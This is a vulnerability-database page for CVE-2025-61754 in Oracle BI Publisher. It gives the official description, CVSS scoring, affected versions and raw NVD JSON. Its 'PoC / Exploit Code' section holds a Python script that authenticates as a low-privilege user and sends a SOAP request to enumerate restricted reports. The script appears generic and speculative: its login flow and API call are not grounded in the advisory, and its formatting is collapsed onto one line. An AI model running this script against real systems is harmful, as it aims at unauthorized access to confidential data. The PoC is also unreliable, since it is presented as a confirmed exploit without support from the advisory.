Security Vulnerability Report
中文
CVE-2025-61754 CVSS 6.5 MEDIUM

CVE-2025-61754

Published: 2025-10-21 20:20:52
Last Modified: 2025-10-24 14:36:01
Source: [email protected]

Description

Vulnerability in the Oracle BI Publisher product of Oracle Analytics (component: Web Service API). Supported versions that are affected are 7.6.0.0.0 and 8.2.0.0.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle BI Publisher. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle BI Publisher accessible data. CVSS 3.1 Base Score 6.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N).

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:oracle:bi_publisher:7.6.0.0.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:oracle:bi_publisher:8.2.0.0.0:*:*:*:*:*:*:* - VULNERABLE
Oracle BI Publisher 7.6.0.0.0
Oracle BI Publisher 8.2.0.0.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-61754 Oracle BI Publisher Web Service API Information Disclosure PoC # This PoC demonstrates unauthorized access to sensitive data via Web Service API # Note: Requires valid low-privilege credentials import requests # Target Oracle BI Publisher server TARGET_URL = "https://target-host:port/xmlpserver/services/v2/ReportService" # Low-privilege attacker credentials USERNAME = "low_priv_user" PASSWORD = "password123" # Step 1: Authenticate to obtain session def authenticate(): """Authenticate with low-privilege credentials""" auth_payload = { "username": USERNAME, "password": PASSWORD } session = requests.Session() response = session.post( f"{TARGET_URL}/login", json=auth_payload, verify=False ) if response.status_code == 200: print("[+] Authentication successful with low-privilege account") return session else: print("[-] Authentication failed") return None # Step 2: Exploit Web Service API to access unauthorized reports def exploit_data_access(session): """Access sensitive reports that should be restricted""" # Attempt to list all available reports (bypassing access control) headers = { "Content-Type": "application/soap+xml", "SOAPAction": '"getAllReportDefinitions"' } soap_payload = """<?xml version="1.0" encoding="UTF-8"?> <soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope"> <soap:Body> <getAllReportDefinitions> <reportRequest> <reportAbsolutePath>/~weblogic/</reportAbsolutePath> </reportRequest> </getAllReportDefinitions> </soap:Body> </soap:Envelope>""" response = session.post(TARGET_URL, data=soap_payload, headers=headers) if response.status_code == 200: print("[+] Successfully retrieved sensitive report data") print(f"[+] Response contains confidential information") return response.text else: print(f"[-] Exploit failed with status: {response.status_code}") return None # Step 3: Extract sensitive data from response def extract_sensitive_data(response_data): """Parse and extract confidential information from API response""" if response_data: # Extract report paths, names, and metadata import re report_paths = re.findall(r'<reportAbsolutePath>(.*?)</reportAbsolutePath>', response_data) print(f"[+] Found {len(report_paths)} accessible reports:") for path in report_paths: print(f" - {path}") return report_paths return [] # Main exploit chain if __name__ == "__main__": print("[*] CVE-2025-61754 Exploit PoC") print("[*] Oracle BI Publisher Web Service API Information Disclosure\n") session = authenticate() if session: data = exploit_data_access(session) if data: extract_sensitive_data(data) print("\n[!] Vulnerability confirmed - unauthorized data access achieved")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-61754", "sourceIdentifier": "[email protected]", "published": "2025-10-21T20:20:51.847", "lastModified": "2025-10-24T14:36:01.160", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vulnerability in the Oracle BI Publisher product of Oracle Analytics (component: Web Service API). Supported versions that are affected are 7.6.0.0.0 and 8.2.0.0.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle BI Publisher. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle BI Publisher accessible data. CVSS 3.1 Base Score 6.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-267"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:oracle:bi_publisher:7.6.0.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "AB270CE9-4B22-4AF9-9CF6-92B078B644EF"}, {"vulnerable": true, "criteria": "cpe:2.3:a:oracle:bi_publisher:8.2.0.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "5EF4E48D-02E2-4AF0-B8F2-0BDB1C7B4AD1"}]}]}], "references": [{"url": "https://www.oracle.com/security-alerts/cpuoct2025.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.